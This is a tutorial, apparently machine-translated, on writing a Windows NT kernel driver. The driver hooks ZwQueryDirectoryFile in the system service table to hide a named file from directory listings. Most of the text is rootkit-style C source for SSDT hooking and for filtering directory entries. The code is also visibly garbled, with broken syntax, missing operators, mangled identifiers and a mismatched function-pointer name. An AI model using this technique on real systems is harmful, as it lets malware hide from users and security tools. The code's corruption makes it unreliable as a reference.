There are many ways to hide files and directories in NT, the simplest one is to add system properties and hide attributes to files and folders, and the operating system will not be displayed, and the lookup can not be found, but this The method is not thorough, there is no availability! Let's introduce the NTAPI to intercept NTAPI with the NT driver to achieve the purpose of completely hide files and directories. There is a file NTDLL.DLL under NT, most NTAPI is packaged in this library. The API interface that implements the lookup file and directory is ZwQueryDirectoryFile, so we can completely hide the file and directory as long as we intercept this API! Let's take a step below (Preparation: Find a WDM driver model in NTDDK, which is the simplest driver):
1. Define the third structure of file_information_class: _file_both_dir_information, this structure is ZwQueryDirectoryFile must be parameters.
typedef struct _FILE_BOTH_DIR_INFORMATION {ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName [12]; WCHAR FileName [1 ];} File_both_dir_information, * pfile_both_dir_information;
2. Secure ZwQueryDirectoryFile first, then define the prototype of ZwQueryDirectoryFile:
extern NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile (IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, In Boolean BrestartQuery;
/ / Define the prototype of ZWQueryDirectoryFile
typedef NTSTATUS (* REALZWQUERYDIRECTORYFILE) (IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL , In boolean brestartQuery; // Define a original function pointer RealzwQuerySystemInformation RealzwQuerySystemInformation;
3. Define the prototype of replacing the API function:
NTSTATUS HookZwQueryDirectoryFile (IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery );
4. Add the following statement in the DriveREntry function:
/ / Save the true ZWQueryDirectoryFile function address
SystemService (ZwQueryDirectoryFile);
// Point the custom replacement function pointer to the real ZwQueryDirectoryFile function
SystemService (ZwQueryDirectoryFile) = hookzwquerydirectoryfile;
5. Add recovery code in the DRIVERUNLOAD function:
// Restore the original function pointer
SystemService (zwQueryDirectoryFile) = RealzwQueryDirectoryFile;
6. Now preparing work is done, the function pointer has been set to turn, and the rest is to implement this we customize the replacement function HookzwQueryDirectoryFile, the code is as follows:
NTSTATUS HookZwQueryDirectoryFile (IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery ) {NTSTATUS rc; ULONG CR0VALUE; ANSI_STRING ansiFileName, ansiDirName, HideDirFile; UNICODE_STRING uniFileName; // initialize the name of the file to be misplaced here is debug.exe RtlInitAnsiString (& HideDirFile, "DBGVIEW.EXE"); // function to perform real ZwQueryDirectoryFile rc = ((REALZWQUERYDIRECTORYFILE) (RealZwQueryDirectoryFile)) (hFile, hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock, FileInformationBuffer, FileInformationBufferLength, FileInfoClass, bReturnOnlyOneEntry, PathMask, bRestartQuery); / * If successful (and FILE_INFORMATION_CLASS value FileBothDirectoryInformation, we processed Filtering * / if (NT_Success (RC) && (File InfoClass == FileBothDirectoryInformation)) {PFILE_BOTH_DIR_INFORMATION pFileInfo; PFILE_BOTH_DIR_INFORMATION pLastFileInfo; BOOL bLastOne; // assigns the result to the execution pFileInfo pFileInfo = (PFILE_BOTH_DIR_INFORMATION) FileInformationBuffer; pLastFileInfo = NULL;! // check loop do {bLastOne = (pFileInfo-> NextEntryOffset) ; RtlInitUnicodeString (& uniFileName, pFileInfo-> FileName); RtlUnicodeStringToAnsiString (& ansiFileName, & uniFileName, TRUE); RtlUnicodeStringToAnsiString (& ansiDirName, & uniFileName, TRUE); RtlUpperString (& ansiFileName, & ansiDirName); // print the results, with debugview can view the print result DbgPrint ( " ANSIFILENAME:% S / N ", ANSIFILENAME.BUFFER);
DBGPrint ("Hidedirfile:% S / N", Hidedirfile.buffer; // Start comparison, if you find this file or directory IF (RTLComparename.buffer, hidedirfile.buffer, hidedirfile.length) == Hidedirfile .Length) {DbgPrint ( "This is HideDirFile / n!"); if (bLastOne) {if (pFileInfo == (PFILE_BOTH_DIR_INFORMATION) FileInformationBuffer) {rc = 0x80000006; // file or directory hidden;} else {pLastFileInfo-> NextEntryOffset = 0;} break;} else // pointer moves back {int iPos = ((ULONG) pFileInfo) - (ULONG) FileInformationBuffer; int iLeft = (DWORD) FileInformationBufferLength - iPos - pFileInfo-> NextEntryOffset; RtlCopyMemory ((PVOID) pFileInfo, (PVOID) ((char *) pFileInfo pFileInfo-> NextEntryOffset), (DWORD) iLeft); continue;}} pLastFileInfo = pFileInfo; pFileInfo = (PFILE_BOTH_DIR_INFORMATION) ((char *) pFileInfo pFileInfo-> NextEntryOffset); WHILE (!!); RTLFreeansString (& ANSIDIRNAME); RTLFreeansString (& ANSIFileName);} Return (RC);} This code is in development machine (Wi NXP SP1 XPDDK) on the test!
